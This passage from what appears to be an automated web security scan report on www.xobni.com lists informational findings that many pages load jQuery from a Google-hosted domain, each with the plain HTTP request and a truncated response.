Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12089

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Jobs</TITLE>
   <me
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.5. http://www.xobni.com/about/jobs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/jobs.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /about/jobs.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/about/contact
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12101

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Jobs</TITLE>
   <me
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.6. http://www.xobni.com/about/opensource previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/opensource

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /about/opensource HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9208

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.7. http://www.xobni.com/about/opensource.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/opensource.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /about/opensource.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9220

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.8. http://www.xobni.com/account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10304

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<link rel='stylesheet' href='/csscache/1265760498/styles/account.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.9. http://www.xobni.com/admin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/admin/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /admin/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.10. http://www.xobni.com/advanced-search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/advanced-search

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /advanced-search HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12676

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Advanced Search f
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.11. http://www.xobni.com/autosuggest-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/autosuggest-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /autosuggest-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

12.12. http://www.xobni.com/blackberry previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/blackberry

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /blackberry HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15880

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.13. http://www.xobni.com/csscache/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.14. http://www.xobni.com/csscache/1256842155/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/1256842155/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/1256842155/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.15. http://www.xobni.com/csscache/1256842155/styles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/1256842155/styles/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/1256842155/styles/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.16. http://www.xobni.com/csscache/1265760498/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/1265760498/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/1265760498/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.17. http://www.xobni.com/csscache/1265760498/styles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/1265760498/styles/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/1265760498/styles/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.18. http://www.xobni.com/csscache/1291147037/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/1291147037/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/1291147037/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.19. http://www.xobni.com/csscache/1291147037/styles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/csscache/1291147037/styles/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /csscache/1291147037/styles/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.20. http://www.xobni.com/developer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/developer/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /developer/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/press/testimonials
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.6.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 14030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Developer Z
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.21. http://www.xobni.com/developer/gadget_hoovers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/developer/gadget_hoovers

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /developer/gadget_hoovers HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13548

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Zone de d..velopp
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.22. http://www.xobni.com/download previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
